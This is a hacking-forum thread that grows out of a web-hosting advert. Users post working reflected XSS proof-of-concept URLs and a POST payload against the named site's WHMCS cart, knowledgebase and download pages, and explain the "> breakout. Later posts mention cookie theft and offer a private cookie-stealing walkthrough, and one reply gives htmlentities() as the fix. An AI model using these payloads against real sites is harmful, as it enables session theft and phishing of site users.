Anyone on here looking for really cheap and really good web hosting?

Hey guys. My buddy "Romes" has had Web Hosting services for quite some time now. I usually help him on and off but I am helping him get more clients now. I am just interested in knowing if there is anyone who wants to start a good cheap site. Well the link is currently tfbgaming.biz. The site is TFB Hosting its just the domain we had, tfbhosting.biz was spoofed or something.

Have you ever heard of IXwebhosting.com, Its what i use for 5.95 you get.

Unlimited Domains

600 GB Web Space

1 Free Domain Registration

6,000 GB Data Transfer

Unlimited Sub Domains

i use bis plan.

Unlimited Domains

1,000 GB Web Space

2 Free Domain Regs

8,000 GB Data Transfer

Unlimited Sub Domains

There are quite many XSS vulnerabilities in this site :right:

markuphttp://www.tfbgaming.biz/whmcs/cart.php?a=add&domain="><script>alert(123)</script>

OR

markuphttp://www.tfbgaming.biz/whmcs/knowledgebase.php?action=search&search=wawawa%22%20onmouseover=%22javascript:alert(123) Hover the search link in the upper right corner on this page

OR

markuphttp://www.tfbgaming.biz/whmcs/downloads.php?action=search&search=wawawa%22%20onmouseover=%22javascript:alert(123) Hover the search link in the upper right corner on this page

OR

POST data: domain=%22+onmouseover%3D%22javascript%3Aalert%28123%29&ext=.com&code=```
And hover the search box

a good cheap site

Wow. Well… thats nice to know. Ha. Well thanks. And if someone had this information they couldnt do much could they? XSS pisses me off. So I ignore it for now.

chronicburst wrote: And if someone had this information they couldnt do much could they?

Except from stealing cookies and login details and using them for editing other people's sites, adding phishing frames, keylogging users on the site using XSS Shell, defacing pages and a bunch of other harmless things, no they couldn't do much :D

Go on and ignore it, XSS never hurt anyone.

lmao! maybe he ignores it because he can't fix it?

No i totally agree, like the most harmful ins't XSS, so yeah, well how hard is it to fix actually.

And if you can't code your own filter google XSS filter!

Its not the most harmful XSS when in a search bar… But as Uber0ne stated Cookie stealing can come from it. If the site is trusted people can use Physhing attacks to get people to go to the link.

I feel all XSS should be patched even if in search bar, its not to much to patch it.

Well as I stated earlier I never took time in to learning of the XSS yet. So if anyone here can point me into the right direction to fix thes complications.

hahah sucks for you,…..you got a vulerability in your site and you don't know how to fix it hahahhah…..oh a couple questions about XSS then

1. why is it you have to include "> and why doesnt it do letter?…theni tried HTML entites and that didnt work either…

chronicburst wrote: Well as I stated earlier I never took time in to learning of the XSS yet. So if anyone here can point me into the right direction to fix thes complications.

I'd recommend using the PHP function htmlentities() on the variable before printing it ;)

cis_slayer wrote: why is it you have to include "> and why doesnt it do letter?…

Scenario: You search for DOG. In the result page you can read this: <form method="post" action="/whmcs/cart.php?a=add&domain=DOG">

Now how to escape the form action thing? Easy! <form method="POST" action="variable value"> so all we have to do is make it think it has reached the end of the action URL value by inserting "> and all text after it will be executed as HTML (or for example javascript…) We use for example DOG"><script>alert(123)</script> and it outputs

<form method="post" action="/whmcs/cart.php?a=add&domain=DOG"> <script>alert(123)</script> ">

So, you include "> in order to make it to break out of for example text boxes, form actions etc. You can escape text fields by inserting </textarea> and titles by inserting </title> etc ;)

Useful reply Uber0ne maybe you should put together a nice XSS article about patching rather than XSS hacks be good to get some good articles going on HBH.

Good idea :D I'd love to write something about XSS ^^

Speaking of XSS vulnerabilities, I just found two in the web based login system for Novell Groupwise 7 xD

Nice work man, you like the XSS king around this pllace.

Haha thanks :) I guess I've gotten used to it because I almost always look for xss on every page I visit xD my XSSed.com list has become quite long on just a few months… :happy:

Thanks Uber0n, Thats really cool….i do agree that you could write a killer XSS article.

Will there be a new zine or not? In that case I could write it for the zine instead :happy:

The zine is happening we got some good articles coming from Cheese, and yes Uberon your more than welecome to write it for the zine instead. When you wrote it either email it to my hotmail on my profile or add me on MSN with that email.

Cheers man.

Well im starting to think that it is time to learn XSS from all the confusion thats built up. Well not that much but I am so unfimiliar with it. Can anyone show me a demonstration of how you would get the cookies or etc from these vulnribilities.

You know, if you knew Javascript and PHP you wouldn't be asking this. That brings me to my next question, why don't you go learn some PHP and Javascript?

I agree. It is time for me to go and learn some PHP. and what the hell did you do? you have 25 warn?

<politicallyincorrect> The (white) elves did it with guns (from america). </politcallyincorrect>

spyware wrote: <politicallyincorrect> The (white) elves did it with guns (from america). </politcallyincorrect>

GO AMERICA!!

In all seriousness though. What do you have to do to get banned/warned?

Follow my lead =]

Hahahahah :) good answer! :evil:

You can PM me and I'll give you a full walkthrough of how to steal cookies from that website ;)

I might not be able to answer the PM before Saturday though, I'll be responsible for the network on a big LAN in town this weekend so I need today and tomorrow to prepare some stuff.

All right, that sounds cool. Thanks!

http://www.w3schools.com

read up through there, great place to learn really all the basics you should need, from there just go to the developers websites forums or google the language for nice tricks

I remember my dad telling me about w3schools. This is a really well thought up site. Well thanks for reminding me. So out of curiousity. How long have you been into graphic desgin. You are truley amzingly talented at it.